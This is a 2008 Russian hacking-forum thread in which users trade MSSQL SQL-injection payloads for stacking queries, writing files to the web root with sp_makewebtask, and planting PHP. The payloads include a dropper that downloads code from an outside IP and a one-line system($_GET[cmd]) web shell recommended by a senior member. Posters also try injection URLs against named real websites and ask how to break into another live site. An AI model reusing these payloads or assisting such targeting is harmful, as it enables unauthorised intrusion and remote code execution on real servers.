11.07.2008, 06:23
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
ДЛя MSSQL нашел как вывести в файл запрос.
EXEC master..sp_makewebtask “file.txt”, “sql-query”.
Пробую - http://ip/stats.php?type=man';exec+master..sp_makewebtask+'D :\appserv\www\123.txt', 'select+*+FROM+dbo.auth'-- но результат ноль пишет Incorrect syntax near '\'. Как залить шелл через мсску... или вывести данные в тхт файл..
З.Ы. - None, прочитал статью https://forum.antichat.ru/thread30501.html. через подзапрос почему то не выводит из таблиц зато через UNION работает на ура..На такой запрос '+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' name'))-- как только начинаю использовать NOT IN сразу не правильный синтаксис... =((
|
|
|
11.07.2008, 08:18
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
Разобрался с выводом файл делаю так:
http://ip/stat.php?type=melee';EXEC master..sp_makewebtask [D:\appserv\www\12.txt],[SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13+FROM+dbo..users]--
- Работает! а как зделать что бы как в Mysql через OUTFILE заливать шелы.. мне надо вставить вот это <?php $a=file_get_contents(\'http://ip/2008.txt\'); $f=fopen(\'sql.php\',\'a\'); fputs($f,$a); fclose($f); ?> - вставляя в одну из колонок так же как в mysql в файл вообще не е не скидывается..
Как мне вывести в файл вот этот кусок кода? |
|
|
|
11.07.2008, 08:53
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
Нашел такое во трешение но опять споткнулся..
создать таблицу залить в неё пхп скрипт и потом вывести в в файл..
делаю http://ip/stat.php?type=melee';create table shell (code varchar(8000))--
потом insert into shell (code) values ('|code|')-- а вотут опять пишет на синтаксис, что тут не так?
Если вписывать INSERT into dbo..shell (code) values (123)-- без ковычек.. то в базу добавляется значение 123.. а пхп скрипт даже <?php phpinfo(); ?> вообще ни как=((?
Последний раз редактировалось 6u4yxa; 11.07.2008 в 09:03..
|
|
|
|
11.07.2008, 09:31
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Сообщение от 6u4yxa
Нашел такое во трешение но опять споткнулся..
создать таблицу залить в неё пхп скрипт и потом вывести в в файл..
делаю http://ip/stat.php?type=melee';create table shell (code varchar(8000))--
потом insert into shell (code) values ('|code|')-- а вотут опять пишет на синтаксис, что тут не так?
Если вписывать INSERT into dbo..shell (code) values (123)-- без ковычек.. то в базу добавляется значение 123.. а пхп скрипт даже <?php phpinfo(); ?> вообще ни как=((?
INSERT into dbo..shell (code) values (CHAR(65)+CHAR(67)....)
в ASCII переведи, если при конкатенации знаком "+" возникнут проблемы, то можно использовать функцию STUFF для конкатенации значений.
Последний раз редактировалось z3r0cool; 11.07.2008 в 09:43..
|
|
|
|
11.07.2008, 10:30
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
Вообещм разобрался пошел по пути создание базы запись в неё пхп скрипта и вывод в файл..
так как из за ковычек не как не хотел использовал http://www.motobit.com/util/binary-file-to-sql-hexstring.asp для перевода в хекс после этого запись в базу без проблем, но заливая туда скрипт <?php $a=file_get_contents('ip/123.txt'); $f=fopen('sqlsearch.php','a'); fputs($f,$a); fclose($f); ?> (ввиде хекса)- и после того как данные таблицы вывожу в файл ковычки автоматом почему то экранируются и получается <?php $a=file_get_contents(\'http://ip/123.txt\'); $f=fopen(\'sqlsearch.php\',\'a\'); fputs($f,$a); fclose($f); ?> после чего перейдя по ссылке сыпятся ошибки -
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in D:\AppServ\www\5.php on line 20
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20
как это обойти?
Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20
|
|
|
|
11.07.2008, 11:36
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от 6u4yxa
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20
как это обойти?
Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20
Залей просто <?system($_GET[cmd]);?> через него и рули. (site/shell.php?cmd=dir) к примеру.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
11.07.2008, 14:41
|
|
Новичок
Регистрация: 09.07.2008
Сообщений: 3
С нами:
9389176
Репутация:
1
|
|
братья, простите что немного не потеме....
помогите сделать такую штуку: домен site.ru у него есть внутренняя страница, например про стройку, как сделать название страницы и в какой кодировке прописать ее в коде страницы, чтобы при переходе на данную страницу она имела такой вид: "www.site.ru/стройка" ???
|
|
|
|
11.07.2008, 19:40
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
http://www.nationalwellness.org/index.php?id=619&id_tier=1+or+1=(SELECT+TOP+1+TABL E_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
что тут не так ?
|
|
|
|
11.07.2008, 20:05
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от sabe
что тут не так ?
это Access
|
|
|
|
12.07.2008, 15:52
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
С нами:
9545988
Репутация:
63
|
|
Как можно расшарить вот этот сайт http://citywars.ru/?
ВРоде бы как защита слабая
(что то есть)
http://citywars.ru/photo/
... .ПОмоите что нибудь найти ->Игра начала работать только вчера
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
